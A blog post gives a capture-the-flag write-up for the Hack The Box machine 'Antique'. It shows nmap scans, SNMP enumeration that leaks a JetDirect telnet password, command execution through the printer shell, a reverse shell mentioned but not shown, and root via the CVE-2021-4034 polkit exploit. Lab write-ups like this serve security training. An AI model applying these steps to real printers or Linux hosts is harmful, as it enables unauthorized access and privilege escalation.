Post

Antique

Posted Updated
By Jorge Figueras
4 min read
Antique

Descripción

Antique Writeup

Table of Contents

  1. Service Enumeration
  2. SNMP Enum
  3. Privilege Escalation

1. Recon

As usual, we start with an Nmap scan to identify open ports and services.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

figueron@kali$ nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.11.107
Starting Nmap 7.80 ( https://nmap.org ) at 2022-05-02 00:47 UTC
Nmap scan report for 10.10.11.107
Host is up (0.097s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
23/tcp open  telnet

Nmap done: 1 IP address (1 host up) scanned in 8.00 seconds
figueron@kali$ nmap -p 23 -sCV -oA scans/nmap-tcpscripts 10.10.11.107
Starting Nmap 7.80 ( https://nmap.org ) at 2022-05-02 00:50 UTC
Nmap scan report for 10.10.11.107
Host is up (0.090s latency).

PORT   STATE SERVICE VERSION
23/tcp open  telnet?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns, tn3270: 
|     JetDirect
|     Password:
|   NULL: 
|_    JetDirect
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port23-TCP:V=7.80%I=7%D=5/2%Time=626F2AC3%P=x86_64-pc-linux-gnu%r(NULL,
SF:F,"\nHP\x20JetDirect\n\n")%r(GenericLines,19,"\nHP\x20JetDirect\n\nPass
...[snip]...
SF:rect\n\nPassword:\x20");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 166.19 seconds

As we only have port 23 open, we can try to connect to it using telnet.

1
2
3
4
5
6
7
8

figueron@kali$ telnet 10.10.11.107
Trying 10.10.11.107...
Connected to 10.10.11.107.
Escape character is '^]'.

HP JetDirect

Password:

We try to log with some common credentials, but they dont work, so lets try to search for udp ports.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

figueron@kali$ sudo nmap -sU --top-ports 10 -sV 10.10.11.107
Starting Nmap 7.80 ( https://nmap.org ) at 2022-05-02 10:22 UTC
Nmap scan report for 10.10.11.107
Host is up (0.090s latency).

PORT     STATE  SERVICE      VERSION
53/udp   closed domain
67/udp   closed dhcps
123/udp  closed ntp
135/udp  closed msrpc
137/udp  closed netbios-ns
138/udp  closed netbios-dgm
161/udp  open   snmp         SNMPv1 server (public)
445/udp  closed microsoft-ds
631/udp  closed ipp
1434/udp closed ms-sql-m

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.35 seconds

We can see that we have an SNMP service running on port 161, so we can try to enumerate it.

2. SNMP Enum

1
2

figueron@kali$ snmpwalk -v 2c -c public 10.10.11.107
iso.3.6.1.2.1 = STRING: "HTB Printer"

This is a printer, there are lots of blogs about printers and how to exploit them, so we can try to search for some exploits. Hacking Network Printers

1
2
3

figueron@kali$ snmpwalk -v 2c -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 
33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135

Now, just convert the hex to ascii and use this password to login to the telnet service.

1
2
3
4
5
6
7
8

figueron@kali$ telnet 10.10.11.107
Trying 10.10.11.107...
Connected to 10.10.11.107.
Escape character is '^]'.

HP JetDirect

Password: xxxxxxxx

Inside the printer shell, we can use exec to run commands in the same way as a bash shell.

1
2

> exec id
uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)

So we just set up a reverse shell to get the user flag.

We are logged in as lp, which can read the flag.

3. Privilege Escalation

If we run Linpeas, we can see that this kernel version is vunerable to polkit exploit.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

lp@antique:/dev/shm$ dpkg -s policykit-1
Package: policykit-1
Status: install ok installed
Priority: optional
Section: admin
Installed-Size: 560
Maintainer: Ubuntu Developers <ubuntu-devel-discuss@lists.ubuntu.com>
Architecture: amd64
Multi-Arch: foreign
Version: 0.105-26ubuntu1.1
Depends: dbus, libpam-systemd, libc6 (>= 2.7), libexpat1 (>= 2.0.1), libglib2.0-0 (>= 2.37.3), libpam0g (>= 0.99.7.1), libpolkit-agent-1-0 (= 0.105-26ubuntu1.1), libpolkit-gobject-1-0 (= 0.105-26ubuntu1.1), libsystemd0 (>= 213)
Conffiles:
 /etc/pam.d/polkit-1 7c794427f656539b0d4659b030904fe0
 /etc/polkit-1/localauthority.conf.d/50-localauthority.conf 2adb9d174807b0a3521fabf03792fbc8
 /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf c4dbd2117c52f367f1e8b8c229686b10
Description: framework for managing administrative policies and privileges
 PolicyKit is an application-level toolkit for defining and handling the policy
 that allows unprivileged processes to speak to privileged processes.
 .
 It is a framework for centralizing the decision making process with respect to
 granting access to privileged operations for unprivileged (desktop)
 applications.
Homepage: https://www.freedesktop.org/wiki/Software/polkit/
Original-Maintainer: Utopia Maintenance Team <pkg-utopia-maintainers@lists.alioth.debian.org>

This can be exploited with CVE-2021-4034, so we can use this exploit to get root.

1
2
3
4
5

lp@antique:/dev/shm$ python3 CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# id
uid=0(root) gid=7(lp) groups=7(lp),19(lpadmin)

Done!!

writeup, easy
machine snmp telnet polkit
This post is licensed under CC BY 4.0 by the author.